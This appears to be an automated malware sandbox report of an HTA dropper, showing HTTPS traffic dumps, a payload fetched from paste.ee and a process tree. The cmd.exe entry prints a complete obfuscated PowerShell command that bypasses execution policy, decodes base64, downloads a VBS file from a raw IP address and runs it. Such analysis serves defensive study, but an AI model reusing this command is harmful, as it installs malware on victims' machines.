                                                                                          2024-12-17 08:45:22 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                                          Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                                          2024-12-17 08:45:22 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                                          Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                                                          2024-12-17 08:45:22 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                                          Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                                          2024-12-17 08:45:22 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                                          Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.849710172.67.187.2004438184C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-17 08:45:46 UTC67OUTGET /r/qVzWL/0 HTTP/1.1
                                                                                          Host: paste.ee
                                                                                          Connection: Keep-Alive
                                                                                          2024-12-17 08:45:47 UTC1277INHTTP/1.1 200 OK
                                                                                          Date: Tue, 17 Dec 2024 08:45:47 GMT
                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Cache-Control: max-age=2592000
                                                                                          strict-transport-security: max-age=63072000
                                                                                          x-frame-options: DENY
                                                                                          x-content-type-options: nosniff
                                                                                          x-xss-protection: 1; mode=block
                                                                                          content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                          CF-Cache-Status: MISS
                                                                                          Last-Modified: Tue, 17 Dec 2024 08:45:47 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dfYLe1n5pKbm0rTgOWnP%2BwnKWQMfTwVjzDRm2QE8vH0X7CCH9JNS6Dty0Ndqvxx3e1J6o6qMOAfU23hMh%2Bxg84k%2Fr7VkmaxnYw%2B4aBlY0zA2d5MQPIZQj7syng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8f35a38e7bff5e80-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          2024-12-17 08:45:47 UTC216INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 37 34 31 26 6d 69 6e 5f 72 74 74 3d 31 37 33 38 26 72 74 74 5f 76 61 72 3d 36 35 38 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 37 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 36 35 33 34 35 34 26 63 77 6e 64 3d 32 31 38 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 62 66 31 63 64 62 33 64 63 64 37 31 32 31 65 66 26 74 73 3d 31 30 32 32 26 78 3d 30 22 0d 0a 0d 0a
                                                                                          Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1741&min_rtt=1738&rtt_var=658&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=681&delivery_rate=1653454&cwnd=218&unsent_bytes=0&cid=bf1cdb3dcd7121ef&ts=1022&x=0"
                                                                                          2024-12-17 08:45:47 UTC1245INData Raw: 33 35 66 33 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35
                                                                                          Data Ascii: 35f3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5
                                                                                          2024-12-17 08:45:47 UTC1369INData Raw: 4a 34 51 78 4e 38 66 44 39 33 41 2f 4e 73 66 44 36 33 67 39 4e 55 66 44 78 33 77 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 69 33 51 34 4e 30 64 44 58 33 51 31 4e 51 64 44 54 33 77 7a 4e 34 63 44 4b 33 41 78 4e 49 63 44 42 33 41 67 4e 38 62 44 37 32 67 75 4e 59 62 44 77 32 67 72 4e 30 61 44 73 32 41 71 4e 63 61 44 6a 32 51 6e 4e 73 5a 44 61 32 67 6c 4e 55 5a 44 52 32 77 69 4e 6b 59 44 49 32 41 68 4e 4d 55 44 39 31 41 66 4e 73 58 44 36 31 41 5a 4e 49 57 44 68 41 41 51 41 6b 42 67 42 41 44 41 41 41 73 44 61 37 51 47 4d 77 41 41 41 41 41 42 41 47 41 4c 41 37 41 7a 4f 6f 6f 44 31 36 41 74 4f 41 72 44 6d 36 67 6e 4f 55 70 44 50 36 67 6a 4f 6f 6f 44 45 35 41 65 4f 49 6e 44 72 35 67 61 4f 49 6d 44 68 35 41 59 4f 38 42 41 41 41 41 44 41 47 41 49 41 34 41 49 4f 38 68
                                                                                          Data Ascii: J4QxN8fD93A/NsfD63g9NUfDx3w6NkeDo3w5NYeDi3Q4N0dDX3Q1NQdDT3wzN4cDK3AxNIcDB3AgN8bD72guNYbDw2grN0aDs2AqNcaDj2QnNsZDa2glNUZDR2wiNkYDI2AhNMUD91AfNsXD61AZNIWDhAAQAkBgBADAAAsDa7QGMwAAAAABAGALA7AzOooD16AtOArDm6gnOUpDP6gjOooDE5AeOInDr5gaOImDh5AYO8BAAAADAGAIA4AIO8h
                                                                                          2024-12-17 08:45:47 UTC1369INData Raw: 36 77 72 4f 30 71 44 72 36 51 71 4f 63 71 44 6c 36 77 6f 4f 45 71 44 66 36 51 6e 4f 73 70 44 5a 36 77 6c 4f 55 70 44 54 36 51 6b 4f 38 6f 44 4e 36 77 69 4f 6b 6f 44 48 36 51 68 4f 4d 6f 44 42 35 77 66 4f 30 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44 74 34 77 4b 4f 6b 69 44 6e 34 51 4a 4f 4d 69 44 68 34 77 48 4f 30 68 44 62 34 51 47 4f 63 68 44 56 34 77 45 4f 45 68 44 50 34 51 44 4f 73 67 44 4a 34 77 42 4f 55 67 44 44 34 51 77 4e 38 66 44 39 33 77 2b 4e 6b 66 44 33 33 51 39 4e 4d 66 44
                                                                                          Data Ascii: 6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfD
                                                                                          2024-12-17 08:45:47 UTC1369INData Raw: 41 65 4e 59 58 44 30 31 67 63 4e 41 58 44 75 31 41 62 4e 6f 57 44 6f 31 67 5a 4e 51 57 44 69 31 41 59 4e 34 56 44 63 31 67 57 4e 67 56 44 57 31 41 56 4e 49 56 44 51 31 67 54 4e 77 55 44 4b 31 41 53 4e 59 55 44 45 31 67 51 4e 41 51 44 2b 30 41 50 4e 6f 54 44 34 30 67 4e 4e 51 54 44 79 30 41 4d 4e 34 53 44 73 30 67 4b 4e 67 53 44 6d 30 41 4a 4e 49 53 44 67 30 67 48 4e 77 52 44 61 30 41 47 4e 59 52 44 55 30 67 45 4e 41 52 44 4f 30 41 44 4e 6f 51 44 49 30 67 42 4e 51 51 44 43 30 41 77 4d 34 50 44 38 7a 67 2b 4d 67 50 44 32 7a 41 39 4d 49 50 44 77 7a 67 37 4d 77 4f 44 71 7a 41 36 4d 59 4f 44 6b 7a 67 34 4d 41 4f 44 65 7a 41 33 4d 6f 4e 44 59 7a 67 31 4d 51 4e 44 53 7a 41 30 4d 34 4d 44 4d 7a 67 79 4d 67 4d 44 47 7a 41 78 4d 49 4d 44 41 79 67 76 4d 77 4c 44 36
                                                                                          Data Ascii: AeNYXD01gcNAXDu1AbNoWDo1gZNQWDi1AYN4VDc1gWNgVDW1AVNIVDQ1gTNwUDK1ASNYUDE1gQNAQD+0APNoTD40gNNQTDy0AMN4SDs0gKNgSDm0AJNISDg0gHNwRDa0AGNYRDU0gENARDO0ADNoQDI0gBNQQDC0AwM4PD8zg+MgPD2zA9MIPDwzg7MwODqzA6MYODkzg4MAODezA3MoNDYzg1MQNDSzA0M4MDMzgyMgMDGzAxMIMDAygvMwLD6
                                                                                          2024-12-17 08:45:47 UTC1369INData Raw: 6d 4f 63 70 44 56 36 77 6b 4f 45 70 44 50 36 51 6a 4f 73 6f 44 4a 36 77 68 4f 55 6f 44 44 36 51 51 4f 38 6e 44 39 35 77 65 4f 6b 6e 44 33 35 51 64 4f 4d 6e 44 78 35 77 62 4f 30 6d 44 72 35 51 61 4f 63 6d 44 6c 35 77 59 4f 45 6d 44 66 35 51 58 4f 73 6c 44 5a 35 77 56 4f 55 6c 44 54 35 51 55 4f 38 6b 44 4e 35 77 53 4f 6b 6b 44 48 35 51 52 4f 4d 6b 44 42 34 77 50 4f 30 6a 44 37 34 51 4f 4f 63 6a 44 31 34 77 4d 4f 45 6a 44 76 34 51 4c 4f 45 68 44 51 34 77 44 4f 34 67 44 4e 34 41 44 4f 73 67 44 4b 34 51 43 4f 67 67 44 48 34 67 42 4f 55 67 44 45 34 41 77 4e 38 66 44 2b 33 51 2f 4e 77 66 44 37 33 67 2b 4e 6b 66 44 34 33 77 39 4e 59 66 44 31 33 41 38 4e 38 65 44 75 33 51 37 4e 77 65 44 72 33 67 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 6c 33 41 35 4e 4d 65 44 69 33
                                                                                          Data Ascii: mOcpDV6wkOEpDP6QjOsoDJ6whOUoDD6QQO8nD95weOknD35QdOMnDx5wbO0mDr5QaOcmDl5wYOEmDf5QXOslDZ5wVOUlDT5QUO8kDN5wSOkkDH5QROMkDB4wPO0jD74QOOcjD14wMOEjDv4QLOEhDQ4wDO4gDN4ADOsgDK4QCOggDH4gBOUgDE4AwN8fD+3Q/NwfD73g+NkfD43w9NYfD13A8N8eDu3Q7NweDr3g6NkeDo3w5NYeDl3A5NMeDi3
                                                                                          2024-12-17 08:45:47 UTC1369INData Raw: 41 41 38 54 30 2f 45 68 50 41 37 6a 64 2b 73 69 50 69 30 6a 74 39 30 61 50 77 30 7a 4a 38 51 4b 50 61 74 7a 59 36 4d 76 4f 2b 6d 6a 7a 35 73 62 4f 7a 67 54 2f 34 6b 53 4e 2f 51 54 35 30 51 33 4d 4e 4f 44 62 79 51 76 4d 54 4c 54 76 79 51 6f 4d 65 45 7a 37 78 55 63 4d 63 42 44 68 77 63 44 41 41 41 41 55 41 55 41 41 41 38 54 76 2f 73 36 50 69 34 44 33 39 4d 74 4f 57 6f 6a 44 36 59 51 4f 2b 6e 7a 39 34 49 7a 4e 32 66 44 35 33 49 39 4e 41 66 6a 72 32 6b 50 4e 51 4d 54 30 7a 38 37 4d 74 4f 7a 6d 7a 6b 34 4d 33 4e 54 5a 7a 4d 31 4d 42 4e 7a 4c 7a 30 78 4d 4c 49 54 2b 79 55 72 4d 68 4b 54 55 79 6f 6b 4d 50 45 54 2b 78 63 63 4d 37 47 44 6a 78 38 58 4d 42 46 44 49 78 59 52 4d 44 41 54 32 77 41 4e 4d 4a 44 7a 68 77 41 49 4d 47 42 44 4d 77 6b 42 4d 53 41 41 41 41 51
                                                                                          Data Ascii: AA8T0/EhPA7jd+siPi0jt90aPw0zJ8QKPatzY6MvO+mjz5sbOzgT/4kSN/QT50Q3MNODbyQvMTLTvyQoMeEz7xUcMcBDhwcDAAAAUAUAAA8Tv/s6Pi4D39MtOWojD6YQO+nz94IzN2fD53I9NAfjr2kPNQMT0z87MtOzmzk4M3NTZzM1MBNzLz0xMLIT+yUrMhKTUyokMPET+xccM7GDjx8XMBFDIxYRMDAT2wANMJDzhwAIMGBDMwkBMSAAAAQ
                                                                                          2024-12-17 08:45:47 UTC1369INData Raw: 4e 4e 6a 4c 7a 77 67 4d 65 4b 44 66 79 77 6d 4d 58 4a 54 54 78 77 61 4d 58 47 6a 6a 78 45 59 4d 32 46 44 49 78 67 42 4d 7a 44 7a 36 77 30 4c 4d 32 43 54 70 77 73 4a 4d 52 43 6a 69 77 73 48 4d 31 42 6a 62 77 4d 47 41 41 41 41 64 41 51 41 67 41 41 41 41 2b 63 75 50 63 37 44 66 2b 51 69 50 65 34 44 47 2b 55 51 50 33 33 7a 37 39 67 64 50 4f 33 7a 77 39 30 62 50 34 32 7a 6b 39 6f 59 50 6d 31 6a 58 39 38 52 50 58 77 6a 31 38 73 4d 50 34 78 6a 63 38 73 41 50 44 73 54 39 37 30 2b 4f 6b 76 7a 32 37 4d 39 4f 4c 76 7a 77 37 67 37 4f 6d 75 6a 6e 37 49 35 4f 4b 75 54 67 37 67 33 4f 77 74 44 61 37 41 32 4f 59 74 7a 53 37 38 7a 4f 33 6f 54 2b 36 30 73 4f 68 71 6a 65 36 51 6e 4f 75 70 44 61 36 41 6d 4f 63 70 54 55 36 49 6b 4f 32 6f 54 4a 36 6b 68 4f 48 6b 7a 34 35 51 64
                                                                                          Data Ascii: NNjLzwgMeKDfywmMXJTTxwaMXGjjxEYM2FDIxgBMzDz6w0LM2CTpwsJMRCjiwsHM1BjbwMGAAAAdAQAgAAAA+cuPc7Df+QiPe4DG+UQP33z79gdPO3zw90bP42zk9oYPm1jX98RPXwj18sMP4xjc8sAPDsT970+Okvz27M9OLvzw7g7Omujn7I5OKuTg7g3OwtDa7A2OYtzS78zO3oT+60sOhqje6QnOupDa6AmOcpTU6IkO2oTJ6khOHkz45Qd
                                                                                          2024-12-17 08:45:47 UTC1369INData Raw: 4d 44 36 7a 49 74 4d 65 4b 54 62 79 49 6d 4d 48 4a 7a 49 79 63 51 4d 31 44 7a 7a 77 45 4c 4d 54 43 6a 54 41 41 41 41 30 43 41 42 67 41 41 41 41 38 44 5a 2f 63 31 50 48 39 6a 4f 2b 49 6f 50 43 35 44 4d 2b 4d 69 50 59 30 44 39 39 51 63 50 33 32 54 6e 39 49 44 50 79 76 7a 54 37 6f 54 4f 39 67 44 33 34 49 46 4f 49 63 7a 38 33 6b 35 4e 47 5a 54 4f 31 73 56 4e 34 55 44 43 7a 63 50 41 41 41 41 52 41 51 41 45 41 41 41 41 34 4d 65 4e 56 57 44 65 31 59 43 4e 41 50 44 71 79 73 75 4d 79 4b 44 6a 79 41 56 4d 7a 42 54 67 77 41 46 41 41 41 41 4a 41 51 41 41 41 38 6a 73 2f 30 32 50 36 34 44 36 2b 73 72 50 4f 32 44 33 39 63 43 50 33 76 6a 70 37 38 31 4f 45 6f 6a 39 34 34 37 4e 79 62 54 58 7a 6b 38 4d 35 4d 7a 45 79 59 76 4d 45 45 6a 48 41 41 41 41 30 41 77 41 77 44 67 50
                                                                                          Data Ascii: MD6zItMeKTbyImMHJzIycQM1DzzwELMTCjTAAAA0CABgAAAA8DZ/c1PH9jO+IoPC5DM+MiPY0D99QcP32Tn9IDPyvzT7oTO9gD34IFOIcz83k5NGZTO1sVN4UDCzcPAAAARAQAEAAAA4MeNVWDe1YCNAPDqysuMyKDjyAVMzBTgwAFAAAAJAQAAA8js/02P64D6+srPO2D39cCP3vjp781OEoj9447NybTXzk8M5MzEyYvMEEjHAAAA0AwAwDgP
                                                                                          2024-12-17 08:45:47 UTC1369INData Raw: 7a 73 77 30 4b 4d 6f 43 6a 6f 77 77 4a 4d 57 43 54 6b 77 73 49 4d 46 43 7a 66 77 6f 48 4d 30 42 6a 62 77 67 47 4d 6a 42 54 58 77 63 46 4d 52 42 44 54 77 59 45 4d 41 42 6a 4f 77 55 44 4d 76 41 54 4b 77 4d 43 4d 65 41 44 47 77 49 42 4d 4d 41 7a 42 77 45 41 41 41 41 41 31 41 4d 41 55 41 41 41 41 2f 73 2f 50 31 2f 44 38 2f 6f 2b 50 6b 2f 6a 33 2f 6b 39 50 54 2f 54 7a 2f 63 38 50 43 2f 44 76 2f 59 37 50 77 2b 7a 71 2f 55 36 50 66 2b 54 6d 2f 51 35 50 4f 2b 44 69 2f 49 34 50 39 39 7a 64 2f 45 33 50 72 39 6a 5a 2f 41 32 50 61 39 44 56 2f 38 30 50 4a 39 7a 51 2f 30 7a 50 34 38 6a 4d 2f 77 79 50 6d 38 54 49 2f 73 78 50 56 38 7a 44 2f 6f 77 50 45 34 6a 2f 2b 67 76 50 7a 37 54 37 2b 63 75 50 68 37 44 33 2b 59 74 50 51 37 6a 79 2b 55 73 50 2f 36 54 75 2b 4d 72 50 75
                                                                                          Data Ascii: zsw0KMoCjowwJMWCTkwsIMFCzfwoHM0BjbwgGMjBTXwcFMRBDTwYEMABjOwUDMvATKwMCMeADGwIBMMAzBwEAAAAA1AMAUAAAA/s/P1/D8/o+Pk/j3/k9PT/Tz/c8PC/Dv/Y7Pw+zq/U6Pf+Tm/Q5PO+Di/I4P99zd/E3Pr9jZ/A2Pa9DV/80PJ9zQ/0zP48jM/wyPm8TI/sxPV8zD/owPE4j/+gvPz7T7+cuPh7D3+YtPQ7jy+UsP/6Tu+MrPu


                                                                                          Click to jump to process

                                                                                          Click to jump to process

                                                                                          Click to dive into process behavior distribution

                                                                                          Click to jump to process

                                                                                          Target ID:0
                                                                                          Start time:03:45:09
                                                                                          Start date:17/12/2024
                                                                                          Path:C:\Windows\SysWOW64\mshta.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:mshta.exe "C:\Users\user\Desktop\greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta"
                                                                                          Imagebase:0x860000
                                                                                          File size:13'312 bytes
                                                                                          MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:1
                                                                                          Start time:03:45:09
                                                                                          Start date:17/12/2024
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
                                                                                          Imagebase:0xa40000
                                                                                          File size:236'544 bytes
                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:2
                                                                                          Start time:03:45:09
                                                                                          Start date:17/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:3
                                                                                          Start time:03:45:09
                                                                                          Start date:17/12/2024
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
